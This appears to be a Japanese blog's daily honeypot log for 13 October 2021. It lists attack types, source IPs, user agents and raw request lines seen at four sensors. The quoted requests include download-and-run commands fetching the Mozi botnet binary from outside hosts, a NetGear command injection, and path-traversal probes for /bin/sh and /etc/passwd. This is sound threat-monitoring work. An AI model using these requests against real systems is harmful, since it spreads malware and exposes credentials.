コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2021/10/13 ハニーポット(仮) 観測記録

ハニーポット(仮) 観測記録 2021/10/13分です。

特徴
共通

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
zgrabによるスキャン行為
/.envへのスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為
WordPress Pluginへのスキャン行為

Location:JP

Nmap Scripting Engineによるスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http[:]//192[.]168[.]1[.]1:8088/Mozi.a;
chmod 777 Mozi[.]a;
/tmp/Mozi.a jaws
Location:US

NetGear製品の脆弱性を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
Anarchy99によるスキャン行為
ZmEuによるスキャン行為
5[.]188[.]210[.]227に関する不正通信
を確認しました。

Location:UK

Gh0stRATのような動き
を確認しました。

Location:SG

Spring Bootの脆弱性を狙うアクセス
を確認しました。

アクセス数推移

JP:総アクセス数:129 (前日比:-2)
US:総アクセス数:56 (前日比:-28)
UK:総アクセス数:59 (前日比:0)
SG:総アクセス数:47 (前日比:-330)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数 送信元IPアドレス
1 3.219.247.90 United States
1 3.238.201.133 United States
1 20.106.56.248 United States
2 23.148.145.239 United States
1 27.200.251.101 China
1 34.70.104.133 United States
1 34.77.162.0 United States
1 39.98.169.217 China
2 40.122.167.171 United States
2 45.143.99.69 Turkey
12 45.146.164.110 Russia
16 46.71.234.152 Armenia
2 54.81.102.131 United States
9 54.90.254.38 United States
2 54.176.147.118 United States
1 61.219.11.151 Taiwan
1 64.227.13.201 United States
1 78.128.112.14 Bulgaria
1 89.248.165.23 United Kingdom
1 94.232.41.161 Russia
1 101.34.85.41 China
1 103.82.144.197 India
19 104.233.196.233 United States
1 111.237.111.81 Japan
5 135.125.244.48 France
2 135.125.246.110 France
1 137.184.109.135 United States
2 137.184.109.194 United States
1 163.204.104.16 China
1 167.99.218.199 United States
3 170.106.155.41 Singapore
1 172.93.111.128 United States
2 174.138.47.65 United States
1 178.128.34.33 United States
1 183.136.225.9 China
1 192.241.202.42 United States
1 192.241.209.135 United States
1 198.12.85.84 United States
1 199.195.253.71 United States
1 209.17.96.90 United States
4 209.141.56.41 United States
4 209.141.56.212 United States
6 209.141.62.185 United States
8 212.34.113.236 Russia
1 212.154.7.246 Turkey

UserAgent一覧

件数 UserAgent
49 -
2 Go-http-client/1.1
1 Hello, world
1 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
1 Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50
12 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE
31 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
5 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
11 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
9 Mozilla/5.0 (compatible; Nmap Scripting Engine; https[:]//nmap[.]org/book/nse.html)
2 Mozilla/5.0 zgrab/0.x
2 curl/7.29.0
1 pjsekai/23 CFNetwork/1197 Darwin/20.0.0
1 python-requests/2.18.4

リクエスト内容一覧

件数 Method Request Protocol
1 -
3 \x03
5 \x16\x03\x01
1 \x16\x03\x01\x01\xfa\x01
14 \x16\x03\x01\x02
1 dN\x93\xb9\xe6\xbcl\xb6\x92\x84:\xd7\x03\xf1N\xb9\xc5;\x90\xc2\xc6\xba\xe1I-\"\xdds\xba\x1fgC:\xb1\xa7\x80+
33 GET /.env HTTP/1.1
1 GET /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /HNAP1 HTTP/1.1
1 GET /__Additional HTTP/1.1
2 GET /_ignition/execute-solution HTTP/1.1
1 GET /ab2g HTTP/1.1
1 GET /ab2h HTTP/1.1
1 GET /api/ HTTP/1.1
11 GET /config/getuser?index=0 HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /docs/cplugError.html/ HTTP/1.1
2 GET /favicon.ico HTTP/1.1
1 GET /hudson HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
2 GET /login.php HTTP/1.1
1 GET /nmaplowercheck1634001231 HTTP/1.1
1 GET /pools HTTP/1.1
1 GET /pools/default/buckets HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /recordings/theme/main.css HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
20 GET /static/js/index.952c9cab.js HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 HEAD / HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /CGI/Execute HTTP/1.1
2 POST /HNAP1/ HTTP/1.0
1 POST /api/jsonws/invoke HTTP/1.1
5 POST /boaform/admin/formLogin HTTP/1.1
1 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Location:US

送信元IPアドレス一覧

件数 送信元IPアドレス
1 5.188.210.227 Russia
1 13.90.146.209 United States
2 23.148.145.239 United States
1 27.203.227.237 China
1 34.86.35.21 United States
2 45.33.96.205 United States
1 45.95.147.26 Netherlands
12 45.146.164.110 Russia
1 61.219.11.151 Taiwan
1 94.102.49.159 United Kingdom
1 94.232.41.161 Russia
2 104.233.196.233 United States
1 115.58.41.164 China
3 135.125.217.54 France
1 149.129.50.37 Singapore
1 165.232.79.43 United States
2 167.99.53.90 United States
1 167.99.218.199 United States
1 172.93.111.128 United States
1 192.241.198.67 United States
1 192.241.204.204 United States
1 192.241.210.200 United States
1 199.195.251.213 United States
6 209.141.56.41 United States
6 209.141.56.100 United States
3 209.141.56.212 United States
1 209.141.62.185 United States

UserAgent一覧

件数 UserAgent
11 -
1 Anarchy99
1 Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; SYMPA; Katiesoft 7; SimulBrowse 3.0)
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
12 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
4 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
7 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
4 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
3 Mozilla/5.0 zgrab/0.x
6 ZmEu
2 curl/7.29.0
1 python-requests/2.18.4

リクエスト内容一覧

件数 Method Request Protocol
2 \x03
1 \x16\x03\x01
1 \x16\x03\x01\x01\xfb\x01
1 dN\x93\xb9\xe6\xbcl\xb6\x92\x84:\xd7\x03\xf1N\xb9\xc5;\x90\xc2\xc6\xba\xe1I-\"\xdds\xba\x1fgC:\xb1\xa7\x80+
5 GET /.env HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /MyAdmin/scripts/setup.php HTTP/1.1
2 GET /_ignition/execute-solution HTTP/1.1
1 GET /actuator/health HTTP/1.1
1 GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0
4 GET /config/getuser?index=0 HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /hudson HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /myadmin/scripts/setup.php HTTP/1.1
1 GET /phpMyAdmin/scripts/setup.php HTTP/1.1
1 GET /phpmyadmin/scripts/setup.php HTTP/1.1
1 GET /pma/scripts/setup.php HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /recordings/theme/main.css HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//27[.]203[.]227[.]237:42433/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /static/index.3e73f18a.css HTTP/1.1
2 GET /static/js/index.952c9cab.js HTTP/1.1
2 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1
1 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 GET http[:]//5[.]188[.]210[.]227/echo.php HTTP/1.1
1 GET http[:]//www[.]1ucn[.]com/proxychecker/index.php HTTP/1.1
1 HEAD /icons/.%2e/%2e%2e/apache2/icons/sphere1.png HTTP/1.1
1 HEAD /icons/sphere1.png HTTP/1.1
1 HEAD /robots.txt HTTP/1.0
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /CGI/Execute HTTP/1.1
1 POST /api/jsonws/invoke HTTP/1.1
7 POST /boaform/admin/formLogin HTTP/1.1
1 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Location:UK

送信元IPアドレス一覧

件数 送信元IPアドレス
1 43.248.96.136 China
1 45.87.61.116 United States
2 45.95.147.26 Netherlands
12 45.146.164.110 Russia
1 61.219.11.151 Taiwan
1 66.240.205.34 United States
1 69.61.242.98 United States
1 78.128.112.14 Bulgaria
1 94.232.41.161 Russia
1 115.59.33.129 China
1 117.222.172.74 India
1 122.199.116.21 South Korea
2 137.184.141.237 United States
2 139.162.207.84 Netherlands
1 165.22.91.153 United States
1 167.172.42.12 United States
3 178.208.164.79 Switzerland
3 185.180.143.71 Portugal
1 192.241.198.134 United States
1 192.241.202.248 United States
1 192.241.206.189 United States
1 198.12.85.84 United States
1 198.98.56.220 United States
2 199.195.251.213 United States
1 209.17.96.242 United States
7 209.141.56.41 United States
4 209.141.56.212 United States
4 209.141.62.185 United States

UserAgent一覧

件数 UserAgent
15 -
1 Go-http-client/1.1
1 Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30)
5 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
12 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
2 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
10 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
9 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
3 Mozilla/5.0 zgrab/0.x
1 python-requests/2.18.4

リクエスト内容一覧

件数 Method Request Protocol
1 -
1 Gh0st\xad
2 \x03
1 \x16\x03\x01
1 \x16\x03\x01\x01\xfc\x01
2 \x16\x03\x01\x02
1 dN\x93\xb9\xe6\xbcl\xb6\x92\x84:\xd7\x03\xf1N\xb9\xc5;\x90\xc2\xc6\xba\xe1I-\"\xdds\xba\x1fgC:\xb1\xa7\x80+
2 GET /.env HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
2 GET /_ignition/execute-solution HTTP/1.1
1 GET /ab2g HTTP/1.1
1 GET /ab2h HTTP/1.1
1 GET /actuator/health HTTP/1.1
1 GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0
1 GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
9 GET /config/getuser?index=0 HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /hudson HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 GET http[:]//wall[.]angelsword[.]cc/lixuan.php HTTP/1.1
1 HEAD /icons/.%%32%65/.%%32%65/apache2/icons/sphere1.png HTTP/1.1
2 HEAD /icons/.%2e/%2e%2e/apache2/icons/sphere1.png HTTP/1.1
2 HEAD /icons/sphere1.png HTTP/1.1
2 HEAD /robots.txt HTTP/1.0
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
1 POST /api/jsonws/invoke HTTP/1.1
10 POST /boaform/admin/formLogin HTTP/1.1
1 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Location:SG

送信元IPアドレス一覧

件数 送信元IPアドレス
1 34.86.35.29 United States
12 45.146.164.110 Russia
1 65.157.23.94 United States
1 103.28.70.137 United States
1 110.180.172.185 China
1 115.61.98.136 China
2 135.125.217.54 France
2 167.71.20.210 United States
1 167.99.191.104 United States
1 167.99.218.199 United States
1 172.93.111.128 United States
1 181.143.170.114 Colombia
2 192.53.170.243 United States
1 192.241.201.33 United States
1 192.241.203.209 United States
1 192.241.206.147 United States
1 198.12.85.84 United States
2 199.195.251.213 United States
1 199.195.253.71 United States
4 209.141.56.41 United States
3 209.141.56.212 United States
3 209.141.62.185 United States
3 212.47.244.68 France

UserAgent一覧

件数 UserAgent
9 -
2 Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0.2) Gecko/20100101 Firefox/56.0.2
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
12 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
4 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
7 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
7 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
3 Mozilla/5.0 zgrab/0.x
1 python-requests/2.18.4

リクエスト内容一覧

件数 Method Request Protocol
1 \x16\x03\x01
1 \x16\x03\x01\x01\xfb\x01
1 CONNECT www[.]bing[.]com:443 HTTP/1.1
4 GET /.env HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
2 GET /_ignition/execute-solution HTTP/1.1
1 GET /ab2g HTTP/1.1
1 GET /ab2h HTTP/1.1
1 GET /actuator/health HTTP/1.1
7 GET /config/getuser?index=0 HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /hudson HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /static/js/index.952c9cab.js HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 GET http[:]//www[.]bing[.]com/ HTTP/1.1
1 HEAD /icons/.%2e/%2e%2e/apache2/icons/sphere1.png HTTP/1.1
1 HEAD /icons/sphere1.png HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
3 POST /HNAP1/ HTTP/1.0
1 POST /api/jsonws/invoke HTTP/1.1
7 POST /boaform/admin/formLogin HTTP/1.1
1 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST http[:]//lindsayvinson[.]site/a2ca1f81249ccda8525ae05c1c77dfb24e9c78cadaac57a48370105862317d9b2f65d7eff530bd00d376212cdd443b25ae972421a1cff4e0034de5cc0dad249f8975a7c185a2464479d7eadf32db3b81ac173c594b1c37b7c88925f4d529ea70 HTTP/1.1